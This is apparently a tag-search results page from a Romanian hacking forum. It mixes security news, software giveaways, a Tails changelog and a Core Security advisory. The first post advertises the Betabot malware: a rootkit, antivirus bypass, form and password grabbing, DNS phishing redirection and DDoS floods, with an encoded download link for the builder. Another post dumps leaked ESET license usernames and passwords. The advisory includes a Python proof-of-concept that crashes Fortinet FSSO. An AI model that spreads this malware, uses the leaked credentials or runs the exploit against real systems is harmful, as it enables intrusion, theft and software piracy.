Jump to content

Search the Community

Showing results for tags 'security'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

  1. Bot http multitasking cu un atacuri DDoS func?ionale ?i altele. Descriere: ============================== List? de func?ii principale Betabot: ============================== * Nivel de sistem Userkit (Ring3 rootkit) Suporta 64 de \ 86 sisteme de bi?i. component intercepteaza rootkit apel x86 sistem func?ie nizkourovnennye (KiFastSystemCall ?i x86SwitchTo64BitMode) pentru a intercepta toate apelurile de sistem efectuate printr-un procedeu f?r? a l?sa urme vizibile de activit??i tale. Cârlige distan?? restaurat în mod automat bot. * ANTI-AV Module Folosind metoda ingineriei genetice sociale (scris în 12 limbi), care apare sub forma unei ferestre legal UAC, barca poate ridica drepturile lor la nivel de administrator. Dup? ob?inerea Betabot drepturi de administrator capabil s? incapacitatea mai mult de 30 de instrumente de antivirus! Rata de succes folosind aceast? metod? pentru aproximativ 70%! Aceast? func?ie este esen?ial? poate fi activat \ dezactivat prin intermediul panoului de control al re?elei bot! List? de instrumente anti-virus acceptate: AhnLab V3 Lite (numai XP) ArcaVir Avast! AVG Avira BitDefender (On config minim) BKAV BullGuard Emsisoft Anti-Malware ESET NOD32 / Smart Security F-PROT IS F-Secure GData IS Ikarus AV K7 AntiVirus Kaspersky AV / IS (doar versiunile mai vechi) Lavasoft Adaware AV Malwarebytes Anti-Malware McAfee Microsoft Security Essentials Norman AntiVirus Norton AntiVirus (numai Vista +) Outpost Firewall Pro Panda AV / IS Panda Cloud AV (versiunea gratuit?) PC Tools AntiVirus Cre?terea AV / IS Sophos Endpoint Antivirus Raport defensiva Trend Micro Vipre Webroot SecureAnywhere AV Windows Defender ZoneAlarm IS * MODUL anti-malware Acest modul v? permite s? scana?i Betabot de sistem (euristice) pentru prezen?a malware si distruge-le (Inclusiv necunoscut noi troieni \ \ virusi). Modul utile pentru cei care doresc s? "cure?e" sarcina lor de concuren?? în plus! * Modul de securitate bot Betabot Procesul \ fisierului bot \ Datele din registrul de Windows sunt sub protec?ia constant de la îndep?rtarea \ distrugere ?i include o varietate de metode (nu numai rootkit). La ?tergerea cheile de registry ?i fi?ier bot vor fi restaurate automat. Acest modul îmbun?t??e?te supravie?uire a desc?rc?ri dumneavoastr?! * Se injecteaz? în procesul de Betabot folose?te mai multe tehnologii samopisnyh injectare în procesul de a eluda o mul?ime de agen?i antivirali (în Runtime) Lista de runde: ArcaVir IS - bypass Avast - bypass Avast Internet Security - este injectat dar cauzeaza fereastr? Cutia cu nisip AVG Internet Security - bypass Avira - bypass Avira Internet Security - bypass BitDefender - bypass (în func?ie de set?rile) BullGuard - Încercarea de a ucide dup? o repornire Comodo - Fereastra Dr. Web - bypass ESET AV / ESET Smart Security - bypass F-Secure - bypass GData - Fereastra K7 AntiVirus - bypass Kaspersky Anti-Virus - bypass (în func?ie de set?rile) Kaspersky Internet Security - bypass (în func?ie de set?rile) McAfee Total Protection - bypass Norman IS - Fereastra Norton Internet Security - bypass Panda Internet Security 2013 - bypass PandaCloud - bypass PC Tools AntiVirus - bypass Rising IS - bypass Defensiva Total - bypass Trend Micro - bypass VIPRE - bypass ZoneAlarm - bypass * Modul Editor DNS Utilizeaza func?ie interceptare sunt esen?iale în victima responsabil pentru activitatea de DNS. Poate fi folosit pentru a înlocui produc?ia de loturile dumneavoastr? (de exemplu, prin phishing Facebook redirec?iona c?tre o pagin? p.r fals facebook.com 127.0.0.1) * C?utarea fi?ierelor Caut? fi?ierele din sistemul are set?ri flexibile ?i o varietate de filtre de cautare. Toate fi?ierele sunt ambalate într-o arhiv? ZIP ?i înc?rca?i la server. * Modulul form? Grabber Formele Rob din urm?toarele browsere: Mozilla Firefox (ultima versiune) Google Chrome (sprijin? SSL) Internet Explorer Toate jurnalele Formular hapsân convenabil sortate în panoul de control. * Modul Grabber FTP / POP3 / SSH Permite furt ?i parolele trimiterea în panoul de control. Totul are loc în timp real! (Putty, Filezilla, etc.) * Modul de protec?ie proactiv? (Aceast? func?ie este op?ional? ?i poate fi activat? \ dezactivat prin intermediul panoului de control) Oportunitati de protec?ie activ? mod bot în acest mod Betabot va bloca orice încercare de a instala software r?u inten?ionat în sistem, precum ?i pentru a detecta automat impotriva deja instalate ?i a le elimina din sistem amprenta! Uneori ai nevoie pentru a opri func?ia prin panoul de control (de exemplu, dac? dori?i s? desc?rca?i la RAT-ul progruz, inutil betabot-l distrug? în mod automat) ============================== Caracteristici suplimentare BETABOT: ============================== * <Size Build 150KB * <Editor Config * <Lock bootkit (nu instituie bootkits de familie Carberp / Rovnix / Gapz, etc.) * <Suport pentru 16 servere -------------------------- * <4 metode diferite de atacuri DDoS (UDP, HTTP inunda?ii, CONNECT-DECONECTA?I inunda?ii, SLOWLORIS FLOOD (KILL APACHE) - DDoS Slowloris de inunda?ii server de web Apache v? permite s? ucid? cu un num?r minim de boti - Conecta?i-Deconecta?i atacuri DDoS inunda?ii este o aparen?? de SYN se bazeaz? pe protocolul TCP. Spre deosebire de SYN unde nu suntem responsabili pentru pachet ACK de la server, CONNECT-DECONECTA?I inunda?ii dribleaz? complet TCP-strângere de mân? (compusul) ?i repet? atât de multe ori. Din cauza lipsei de resurse pentru a procesa num?rul mare de conexiuni la serverul incapacitate de munc?. Am decis s? nu pun? în aplicare inunda?ii SYN datorit? faptului c? potopul plin de acest tip nu sunt disponibile pe sisteme Windows (f?r? editare drivere Tcpip) Utilizarea drivere ter?i, astfel încât nu cel mai bun perspectiva. - HTTP atacuri DDoS împotriva inunda?iilor complet randomizat ?i optimizate - Atac Standard UDP de inunda?ii DDoS -------------------------- * <Autorun USB (LNK cu File) * <SOCKS 4 servere (preia ?osete proxy pe desc?rc?rile) * <Desc?rcare / Actualizare / executie - caracteristici standard înc?rc?tor (suporturi desc?rca fi?iere DLL în zombie memorie proces svchost.exe, precum ?i fi?iere JAR) Panou detaliate ?i frumos. Imagini panou: Acas?: http://i.imgur.com/hdXeq1P.png Editor DNS: http://i.imgur.com/K1tt7MC.png Forma hapsân filtre: http://i.imgur.com/Y7cShSd.png Realtime Grabber Chit / FTP / POP3: http://i.imgur.com/G03jQ8B.png Obiective: http://i.imgur.com/eDKBei0.png Configurarea Socks Proxy: http://i.imgur.com/ritA4WR.png Cerin?e pentru panoul de control În scopul de a g?zdui un panou de control de pe serverul dvs. nevoie de urmatoarele programe: • ionCube Loader 5.3+ • 5.3.x PHP • MySQL • PHPMyAdmin Dowload baza americana 64 aHR0cHMlM0EvL3d3dy5kcm9wYm94LmNvbS9zLzZ6YXQ1dGd6ODZlcmd3aS9CdWlsZGVyJTI1MjAxLjcucmFyJTNGZGwlM0Qw
  2. AVG Internet Security 2015 provides you with protection against viruses, malware, spam, scams, phishing, and more. Plus, it has additional features such as a firewall, internet accelerator, privacy protector, and more. Read more at Nothing found for - | SharewareOnSale Free AVG Internet Security 2015 (100% discount) - SharewareOnSale
  3. Încerca?i,posibil sa nu mearga toate. TRIAL-0129187286 8s9rxcvx6t 2015-04-07 ESS/EAV TRIAL-0129188035 vp8mrv7p4k 2015-04-07 ESS/EAV TRIAL-0129188063 kp7ku642xr 2015-04-07 ESS/EAV TRIAL-0129188096 tu5r2n7878 2015-04-07 ESS/EAV TRIAL-0129188798 fa6pfvhd5j 2015-04-07 ESS/EAV ==================EAV Username: EAV-0126242583 Password: haexu5apfmExpiry Date: 29.11.2015==================EAV Username: EAV-0126486152 Password: dp5vd2h7k8Expiry Date: 26.11.2015==================EAV Username: EAV-0125510021 Password: 38pcaft6x5Expiry Date: 20.11.2015==================EAV Username: EAV-0125516124 Password: evhk3f5x5nExpiry Date: 20.11.2015==================EAV Username: EAV-0125532522 Password: 9bs5r7eehaExpiry Date: 20.11.2015==================EAV Username: EAV-0125534732 Password: 43rb45mtcdExpiry Date: 20.11.2015==================EAV Username: EAV-0125544582 Password: k7hb2252kuExpiry Date: 20.11.2015==================EAV Username: EAV-0124910184 Password: 4s5skp25s8Expiry Date: 12.11.2015==================EAV Username: EAV-0125063347 Password: fxchjaef88Expiry Date: 08.11.2015==================EAV Username: EAV-0124949861 Password: fa85xr8ajeExpiry Date: 06.11.2015==================EAV Username: EAV-0124767094 Password: ss6vd4dbb2Expiry Date: 04.11.2015==================EAV Username: EAV-0124777738 Password: bbnvsun59rExpiry Date: 04.11.2015==================EAV Username: EAV-0124778576 Password: bxsrcmn7saExpiry Date: 04.11.2015==================EAV Username: EAV-0124486437 Password: 8uhhven6nrExpiry Date: 03.11.2015==================EAV Username: EAV-0124752692 Password: u7r85jvua7Expiry Date: 03.11.2015 ==================EAV Username: EAV-0124486422Password: ja9mmkd8srExpiry Date: 02.11.2015==================EAV Username: EAV-0124486427Password: p82djs5n3cExpiry Date: 02.11.2015==================EAV Username: EAV-0124399133Password: ufd2pk4kcjExpiry Date: 30.10.2015==================EAV Username: EAV-0124399134 Password: tddej8b9xeExpiry Date: 30.10.2015==================EAV Username: EAV-0123779192 Password: 3x8r4hmpvfExpiry Date: 26.04.2015==================EAV Username: EAV-0123248361 Password: 3s7vd38tmbExpiry Date: 19.04.2015==================EAV Username: TRIAL-0126342193 Password: bhx7up79u8Expiry Date: 28.02.2015
  4. The noose around the neck of the Internet's most widely used encryption scheme got a little tighter this month with the disclosure of two new attacks that can retrieve passwords, credit card numbers and other sensitive data from some transmissions protected by secure sockets layer and transport layer security protocols. Both attacks work against the RC4 stream cipher, which is estimated to encrypt about 30 percent of today's TLS traffic. Cryptographers have long known that some of the pseudo-random bytes RC4 uses to encode messages were predictable, but it wasn't until 2013 that researchers devised a practical way to exploit the shortcoming. The result was an attack that revealed small parts of the plaintext inside an HTTPS-encrypted data stream. It required attackers to view more than 17 billion (234) separate encryptions of the same data. That was a high bar, particularly given that the attack revealed only limited amounts of plaintext. Still, since the researchers demonstrated the attack could decrypt HTTPS-protected authentication cookies used to access user e-mail accounts, Google and other website operators immediately took notice. Now, researchers have figured out refinements that allow them to recover RC4-protected passwords with a 50-percent success rate using slightly more than 67 million (226) encryptions, a two-order of magnitude reduction over the previous attack used to recover secure cookies. The exploits—laid out in a paper published last week titled Attacks Only Get Better: Password Recovery Attacks Against RC4 in TLS—work against both Basic access authentication over HTTPS and the widely used IMAP protocol for retrieving and storing e-mail. Bar-mitzvah attack A second exploit targeting RC4 was devised by researchers from security firm Imperva and was presented Thursday at the Black Hat security conference in Singapore. The attack uses new ways to exploit the "invariance weakness," a key pattern in RC4 keys that can leak plaintext data into the ciphertext under certain conditions. The weakness first came to light in 2001, and led to the fatal exploit against wired equivalent privacy technology used to encrypt Wi-Fi networks. Given the age of the invariance weakness, Imperva researchers are dubbing their new exploit the "bar-mitzvah attack." "The security of RC4 has been questionable for many years, in particular its initialization mechanisms," Imperva researchers wrote in a research paper that accompanied Thursday's Blackhat talk. "However, only in recent years has this understanding begun translating into a call to retire RC4. In this research, we follow [the 2013 RC4 researchers] and show that the impact of the many known vulnerabilities on systems using RC4 is clearly underestimated." The bar-mitzvah attack requires adversaries to sample about one billion RC4 encryptions to infer a credit card number, password, or authentication cookie key. The known weakness exploited involves a flaw found in one out of every 16 million (224) RC4 keys that leads to "structures" in the "least significant bits" of the keystream. The attack is subject to a significant limitation, however, since the leaky plaintext is contained only in the first 100 bytes of ciphertext. Despite the limitation and the challenge of sampling so many encryptions, the attack may be enough to drastically reduce the cost of doing an exhaustive attack that guesses passwords, credit card numbers or similar data. Rather than try every possible combination, the bar-mitzvah attack allows attackers to hone in on a much smaller number of candidates. The growing body of attacks that defeat SSL and TLS encryption are only one threat facing the system millions of Internet users rely on to encrypt sensitive data and authenticate servers. In 2011 hackers broken into Netherlands-based certificate authority DigiNotar and minted counterfeit credentials for Google and other sensitive Web properties. Earlier this week, shoddy practices at an intermediate CA known as MCS Holdings, allowed its customers to obtain unauthorized certificates for several Google addresses. Poor practices on the part of Microsoft also led to the discovery of misissued certificates, on two separate occasions. “RC4 must die” The TLS protocol has two significant phases. The first "handshaking" phase uses asymmetric encryption to negotiate the symmetric encryption keys to be used by an e-mail or Web server and the connecting end user. During the later "record" phase, the parties use the agreed-upon keys to encrypt data using either the AES block cipher or RC4 stream cipher. The two attacks unveiled this month, combined with the exploit disclosed in 2013, are a strong indication the security of RC4 can't be counted on for much longer and should be phased out in favor of alternative algorithms. Retiring RC4 is proving a challenging proposition. A 2011 attack known as BEAST—short for Browser Exploit Against SSL/TLS—targets an encryption mode known as CBC, or cipher block chaining, which is present in most algorithms except for RC4. After BEAST was demonstrated to pose a credible threat to TLS-protected data in transit many security experts recommended website operators opt for RC4 to blunt the threat. That advice is no longer sound, now that RC4 is under attack, too. Imperva researchers say Web app developers should strongly consider disabling RC4 in all their TLS configurations and tech-savvy end uses should disable RC4 in their Browser settings. In February, the Internet Engineering Task Force submitted a request for comments prohibiting the use of RC4 cipher. Use of RC4 has shrunk from about half of all TLS traffic in 2013 to about 30 percent today, but eliminating it altogether may take years. Hanging in the balance, is the security and confidentiality of millions of Internet users. "RC4 was already looking nervously towards the cliff-edge," Kenny Paterson, a Royal Holloway, University of London professor who helped author last week's research, as well as the 2013 research it built on, wrote in a blog post published last week. "Our work pushes RC4 a significant step closer, leaving it teetering on the brink of oblivion for SSL/TLS. After all, attacks can only get better…" Source
  5. A default setting in both Windows 7 and 8.1 could allow local users to elevate privileges and in some situations, escape application sandboxes. The issue, something that leaves all current Windows client installations vulnerable, lies in the way the operating system handles authentication. In some instances it could be possible for a user to use a reflection attack in NT LAN Manager, a collection of security protocols found in Windows systems, to leverage WebDAV (Web Distributed Authoring and Versioning) and carry out an attack. “It’s possible to abuse cross-protocol NTLM reflection to attack the local SMB server by forcing a local system process to access a WebDAV UNC path,” warned James Forshaw, the Google Project Zero security researcher who found the issue, on Monday. Forshaw discovered the issue last year and reported it to Microsoft’s Security Response Center on Dec. 18 but the time that Project Zero gives to vendors to fix bugs – 90 days – elapsed last week, so the Google Security Research post and its proof of concept were opened to the public. According to Microsoft however the issue doesn’t merit a fix as the company has implemented mitigations for it, like Extended Protection for Authentication, in the past. According to Forshaw’s disclosure timeline, the company informed him in January that undoing the mitigations could cause “application compatibility concerns.” When reached Wednesday a Microsoft spokesperson confirmed that users should implement EPA to avoid reflection attacks using the NTLM as a vector. “Extended Protection for Authentication (EPA) is a security feature built-in to Windows 8 and 8.1, and available for older versions of Windows via knowledge base article 2345886, that helps protect our customers against this technique. We encourage customers to follow the guidance outlined in the article to enable EPA, which is off by default as it may cause some application compatibility concerns.” As EPA doesn’t come enabled by default however, Forshaw is stressing that users looking to avoid reflection attacks follow a different set of precautions, including enabling SMB signing or enabling SMB Server SPN verification. Forshaw points out that users can also disable their Webclient service, something that would make it trickier to elevate to the local system, but that this wouldn’t prevent attacks like sandbox escapes, which require user level permissions. It also might be possible to stage the exploit in another fashion, including via a DCE/RPC call. As Forshaw acknowledges in his write-up, this is far from a new issue for Microsoft – the company actually addressed a similar issue way back in 2008 (MS08-068) that could have let attackers use NTLM to mirror authentication from one machine back to the same machines. The patch disallowed NTLM sessions in flight but failed to address cross-protocol attacks like the one Project Zero found. Source
  6. Product Description Advanced SystemCare 8 PRO. Ultimate Performance Booster Boosts the speed of startup, Internet connection and the whole PC Protects you against spyware and adware in real time Optimizes, cleans, and fixes a variety of PC problems with just 1 click Protects your privacy by cleaning surfing traces automatically Advanced SystemCare 8 PRO provides automated and all-in-one PC care service with Malware Removal, Registry Fix, Privacy Protection, Performance Tune-up, and System Cleaning capabilities. It also creates superior and safer online experience with the latest Browser Anti-Tracking and Internet Boost technology, to ensure your top online security and maximum PC performance. Features: Basic System Clean, Fix and Optimization Ultimate System Tuneup for Top Performance Up to 300% Internet Speedup with Internet Booster Real-time Optimization with Active Optimize Deep Windows Registry Clean Maximum Hard Drive Performance Basic Protection from Security Threats Full Detection against Security Threats Safe Online Experience with Surfing Protection Auto Clean for Privacy Security Whenever You Log on Auto Update to the Latest Version Runs in the Background – Install and Forget It Fantastic New Skins & Themes Free 24/7 Technical Support on demand -> Download <-Deal Expire in:
  7. THE AVERAGE AUTOMOBILE today isn’t necessarily secured against hackers, so much as obscured from them: Digitally controlling a car’s electronics remains an arcane, specialized skill among security researchers. But that’s changing fast. And soon, it could take as little as $60 and a laptop to begin messing around with a car’s digital innards. Tomorrow at the Black Hat Asia security conference in Singapore, 24-year-old Eric Evenchick plans to present a new device he calls the CANtact. The open source board, which he hopes to sell for between $60 and $100, connects on one end to a computer’s USB port, and on the other to a car or truck’s OBD2 port, a network port under its dashboard. That makes the CANtact a cheap interface between any PC and a vehicle’s controller area network or CAN bus, the collection of connected computers inside of every modern automobile that control everything from its windows to its brakes. With just that go-between gadget and the open source software that Evenchick is releasing for free, he hopes to make car hacking a far cheaper and more automated process for amateurs. “I realized that there were no good tools for me to play around with this stuff outside of what the auto industry uses, and those are incredibly expensive,” Evenchick says, referring to products sold by companies like Vector that can cost tens of thousands of dollars. “I wanted to build a tool I can get out there, along with software to show that this stuff isn’t terribly complicated.” Over the last several years, researchers have shown that car hacking represents a real security threat. In 2013, for instance, Darpa-funded security researchers Chris Valasek and Charlie Miller showed (with me as their chosen crash-test dummy) that it was possible to send digital commands from a laptop connected to a car’s CAN bus that affected steering, slammed on brakes, or even disabled brakes at some speeds. Evenchick’s gadget aims to make exactly that sort of testing more accessible to researchers. In their tests, Valasek and Miller used a $150 ECOM cable that they rewired by hand to connect to their test vehicles’ OBD2 ports. (Valasek says a stock cable capable of that connection would have cost $1,200.) Evenchick’s CANtact is designed to make that connection out of the box at a much lower cost. The average coder isn’t familiar with the protocol most cars’ computers rely on to communicate. But Evenchick has written open source software for CANtact that automates much of the manual work of CAN bus hacking. Like the earlier work by Valasek and Miller, the CANtact is designed to send commands in Unified Diagnostics Services, the CAN protocol that auto mechanics use to communicate with electronic control units (or ECUs) throughout a vehicle. That allows anyone to write python scripts that can automatically trigger commands in a car’s digital network that range from turning off its “check engine” light to automatically pumping its brakes. “Most people have no idea there’s all this diagnostic stuff that someone who’s connected to the CAN bus can use to do all these interesting things,” says Evenchick. “What are the extent of those features? And what implementation problems exist that could be big security holes?” For now, actually figuring out what a certain UDS command sent from the CANtact might do in a specific vehicle will largely be a matter of trial and error for amateur car hackers, says Evenchick. But by publishing its software on Github, he hopes the code will become a collection of different hackers’ techniques that target individual vehicle makes and models. “It would be awesome if people messing around with their cars… could work together to build a library [of code] to do all this stuff,” says Evenchick. “You’re a Honda owner, and someone else is a Honda owner. If they find some cool things to do and you want to play around with it too, they can share it.” The CANtact, of course, can only test security exploits that require physical access, not remote attacks. But the device does help to automate the testing of security exploits that would be possible once a hacker has already gained a wireless foothold on a car’s network. And the notion of a hacker gaining that sort of initial wireless foothold in a car’s network is more than theoretical. Researchers at the University of Washington and the University of California at San Diego demonstrated in 2011 that they could gain access to an unnamed car’s network through wireless attacks that included a Bluetooth connection, the car’s OnStar-like cellular radio, and even Android malware on the driver’s phone. Evenchick says his CANtact gadget isn’t intended to make any sort of malicious car hacking easier. Instead, he argues, it’s meant to foster hobbyist car hacking and security research that can expose and help fix real vulnerabilities in the digital components of cars and trucks. Miller and Valasek’s earlier research, for example, served as a public demonstration that cars’ internal networks lack basic security protections. Their work led to Senator Edward Markey sending a series of questions to 20 automakers that eventually revealed widespread inattention to security and in some cases a potential lack of anti-hacking measures in their cars and trucks. Only seven of the companies said they used third party security auditing for their vehicles, and only two said they currently had features to respond to a hacker intrusion on their vehicles’ CAN buses. The more attention and testing those car systems receive, Evenchick says, the more secure they’ll eventually become. “You don’t really own a device until you can open it up and tear it apart,” says Evenchick. “Your car is more connected than ever before. Just having people know what’s going on with cars and understand them better would be kind of nice.” Source
  8. UK-based Darktrace, a cyber security startup that leverages machine learning and mathematics to detect threats, announced this week that it has raised $18 million i funding. Founded in 2013 by senior members of the UK' GCHQ and other intelligence agencies, DarkTrace is headquartered in Cambridge, UK with offices in London, Milan, New York, Paris, San Francisco, Singapore and Washington D.C. The funding came from investors including Invoke Capital, Talis Capital, Hoxton Ventures and private individuals, with the latest funding round valuing the company at $80 million. Darktrace LogoThe company said that its “Enterprise Immune System” technology detects previously unknown threats using machine learning and mathematics developed at the University of Cambridge. In more detail, the explains on its website that the Darktrace platform “models patterns of life for each user and machine” to detect normal and abnormal behaviors as they emerge, without already knowing what it is looking for, and calculate the probability of threat based on the detection of behavioral anomalies. In addition to the funding, the company announced that it has opened an Asia Pacific office in Singapore. Sanjay Aurora, who has more than 25 years' experience leading enterprise software firms, will oversee the expansion process in the Asia Pacific region, Darktrace said. Aurora is joined by John Muser, formerly of IBM Security, heading up Australia and New Zealand, and Stanley Hsu, formerly of McAfee. "Darktrace is growing at a phenomenal rate. It has been barely a year since we deployed to our first customer and now we have deployments at 75 companies and relationships with 50 partners across America, UK, continental Europe and theMiddle East," said Darktrace CEO Nicole Eagan. "Our headcount has tripled over the past year and expansion into Asia is a natural next step." British telecommunications services giant BT announced this month that it was integrating Darktrace's platform, which will be added to BT's security portfolio and be available as both part of an integrated cyber security offering or as a point solution within BT's Assure portfolio of managed security services. BT also said that it would integrate Darktrace into its own enterprise security defenses to protect internal assets. Sursa: securityweek.com
  9. Several security holes that affect Tails 1.3 are now fixed in Tails 1.3.1. We strongly encourage you to upgrade to Tails 1.3.1 as soon as possible. Details Tor Browser: Mozilla Foundation Security Advisory 2015-28, Mozilla Foundation Security Advisory 2015-29 Linux: CVE-2015-1465, CVE-2015-1420 and CVE-2015-1593 OpenSSL: Debian Security Advisory 3197 file and libmagic: Debian Security Advisory 3196 libxfont: Debian Security Advisory 3194 tcpdump: Debian Security Advisory 3193 libgnutls26: Debian Security Advisory 3191 libav: Debian Security Advisory 3189 FreeType 2: Debian Security Advisory 3188 ICU: Debian Security Advisory 3187 NSS: Debian Security Advisory 3186 libgcrypt11: Debian Security Advisory 3185 GnuPG: Debian Security Advisory 3184 libssh2: Debian Security Advisory 3182 libarchive and bsdtar: Debian Security Advisory 3180 libgtk2-perl: Debian Security Advisory 3173 CUPS: Debian Security Advisory 3172 https://tails.boum.org/security/Numerous_security_holes_in_1.3/index.en.html
  10. Zer0 is a user friendly file deletion tool with a high level of security. With Zer0, you'll be able to delete files and to prevent file recovery by a 3rd person. So far, no user reported an efficient method to recover a file deleted by Zer0. Features User friendly HMI : Drag'n'drop, 1 click and the job is done ! High security file deletion algorithm Multithreaded application core : Maximum efficiency without freezing the application. Internationalization support. DOWNLOAD LINK :- KC Softwares
  11. Ever feel your eyes glazing over when you see yet another security warning pop up on your monitor? In a first, scientists have used magnetic resonance imaging to measure a human brain's dramatic drop in attention that results when a computer user is subjected to just two security warnings in a short time. In a paper scheduled to be presented next month at the Association for Computing Machinery's CHI 2015 conference, researchers will present data that maps regions of the brain responsible for visual processing. The MRI images show a "precipitous drop" in visual processing after even one repeated exposure to a standard security warning and a "large overall drop" after 13 of them. Previously, such warning fatigue has been observed only indirectly, such as one study finding that only 14 percent of participants recognized content changes to confirmation dialog boxes or another that recorded users clicking through one-half of all SSL warnings in less than two seconds. Building a better mousetrap The inattention is the result of a phenomenon known as habituation, or the tendency for organisms' neural systems to show partial or complete cessations of responses to stimuli over repeated exposures. Such repetition suppression, or RS, has long been documented in everything from sea slugs to humans. By directly measuring RS in the brains of people exposed to computer security warnings, the scientists were then able to test more effective ways that software makers can alert people to potential risks. The paper—titled "How Polymorphic Warnings Reduce Habituation in the Brain—Insights from an fMRI Study"—is one of two to be presented at CHI 2015 that studies people's responses to security warnings. A second paper is titled "Improving SSL Warnings: Comprehension and Adherence." Besides leading to potential improvements in user interfaces, the research may pave the way for better security education, training, and awareness (SETA) programs, password use, and information security policy compliance. The scientists wrote: The experiment was conducted on 25 participants recruited from a university who were native English speakers. The subjects laid down on their backs on an MRI table and had a volume coil placed over their heads to allow imaging of the entire brain. The participants then viewed experimental images on a large monitor at the opening of the scanner. In all, each participant viewed a unique set of 560 images. A second experiment tracked participants' responses to security warnings in a more natural setting while using a laptop computer. To measure attention paid to a particular warning, the researchers analyzed users' mouse cursor movements along the x and y, and z axes using a timestamp of each movement at a millisecond rate. The habituation response caused by humans' frequent exposure to warnings has been documented as long ago as 2006. Since then, numerous studies have supported what many people know intuitively: the more times a website, computer, or smartphone displays a warning, the harder it is to heed its urgent message. The fatigue sets off a vicious cycle in which many end users increasingly make poorly informed security choices and designers add more warnings to counteract the increased threats. The researcher team—made up of six scientists from Brigham Young University, the University of Pittsburgh, and Google—went on to test so-called polymorphic warnings. As their name suggests, polymorphic warnings change their colors, text, shapes, and other characteristics rather than presenting the same static content each time. The MRI data showed reduced habituation to repeated warnings that changed. A second measurement using mouse tracking also showed reduced habituation from repeated warnings, and it also showed slower habituation. The findings could be seminal for makers of software and hardware alike as they search for new ways to steer users clear of everything from weak password choices to websites pushing malware. "Polymorphic warnings garner more attention over time due to the novelty of their changing appearance," the researchers wrote. "Changing appearance of the warning reinvigorates attention, especially in brain regions that have been shown to demonstrate RS to exact repetitions of visual stimuli. For this reason, polymorphic warnings that continually change their appearance will slow the rate of habituation." Source
  12. 1. Advisory Information Title: Fortinet Single Sign On Stack Overflow Advisory ID: CORE-2015-0006 Advisory URL: http://www.coresecurity.com/advisories/fortinet-single-sign-on-stack-overflow Date published: 2015-03-18 Date of last update: 2015-03-18 Vendors contacted: Fortinet Release mode: Coordinated release 2. Vulnerability Information Class: Stack-based Buffer Overflow [CWE-121] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2015-2281 3. Vulnerability Description Through Fortniet [1] "Single Sign On" or "Single User Sign On" users logged on to a computer network are authenticated for access to network resources through the FortiGate unit without having to enter their username and password again. Fortinet Single Sign On (FSSO) provides Single Sign On capability for Microsoft Windows networks using either Active Directory or NTLM authentication and Novell networks, using eDirectory. FSSO [4] monitors user logons and sends the FortiGate unit the username, IP address, and the list of Windows AD user groups to which the user belongs. When the user tries to access network resources, the FortiGate unit selects the appropriate security policy for the destination. If the user belongs to one of the permitted user groups, the connection is allowed. There is a vulnerability in the message dispatcher used by FSSO Windows Active Directory and FSSO Novell eDirectory. Exploitation of this vulnerability might lead to a full network compromise. 4. Vulnerable packages - FSSO Windows Active Directory 4.3.0161 (4.3.0151, 4.3.0129 were also tested and found vulnerable) - FSSO Novell eDirectory 4.3.0161 Other versions are probably affected too, but they were not checked. 5. Vendor Information, Solutions and Workarounds Core Security recommends those affected use third party software such as Sentinel [3] or EMET [2] that could help to prevent the exploitation of affected systems to some extent. Fortinet published the following FortiGuard Bulletin: [5] 6. Credits This vulnerability was discovered and researched by Enrique Nissim in collaboration with Andres Lopez Luksenberg, both from the Core Security Exploit Writing Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from Core Security Advisories Team. 7. Technical Description / Proof of Concept Code [CVE-2015-2281] The vulnerability in both cases can be exploited by sending a special packet to the services without being authenticated (pre-auth). Given that both software systems require and Administrative account in order to run, (Windows Domain Admin or eDirectory Admin accordingly) the full network is exposed. Pre-authenticated Remote Code Execution with Domain Administrative rights is possible. The vulnerability is located in the Message Dispatcher for message PROCESS_HELLO. Here is a PoC (Proof of Concept) that causes the application thread with the FortiGate appliance to crash: import socket import struct TARGET_IP = "192.168.233.100" def play(): message = "\x80\x01\x42\x42" buff = "A"*248 buff += "B" * (0xfffff - len(buff)) payload = struct.pack(">I", 0x000fffff) + message + buff s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TARGET_IP, 8000)) s.send(payload) buff_recv = s.recv(6000) print buff_recv s.close() play() 8. Report Timeline 2015-01-07: Core Security notifies Fortinet of the vulnerabilities. Publication date is set for February 2nd, 2015. 2015-01-09: Fortinet requests a copy of the advisory draft. 2015-01-09: Core Security sends a draft copy of the advisory to the vendor. 2015-01-14: Fortinet informs they are in the process of validating the report and asks if we want to commit to responsible disclosure. 2015-01-14: Core Security informs the vendor that our policy is to publish our findings in order to help the users to gain awareness of the issues and therefore allowing them to take the necessary precautions to protect themselves. We informed them that we always try to release our findings in a coordinate manner provided that the time the vendor takes to test and fix the issue is reasonable and the publication of this solution and our disclosure is agreed between the two parties. 2015-01-21: Core Security asks the vendor if they were able to review the vulnerabilities and a tentative date for publishing the fix and consequently the advisory. 2015-01-27: Fortinet acknowledges the vulnerabilities and informs that a fix of the source code is in order. The say they'll keep us updated regarding the release schedule. 2015-02-24: Fortinet informed us that the current ETA was the first week of March, but that it could be changed depending on their engineering load. 2015-02-24: Core Security requested a specific date considering that the first week of March was next week. 2015-02-27: Fortinet informed us that they currently don't have a fixed date. Additionally they sent us the link where their FortiGuard Bulletin is going to be published. They requested the CVE ID we are going to assign this issue. 2015-03-05: Core Security informs Fortinet that we still don´t have a CVE ID to share with them because we haven't received 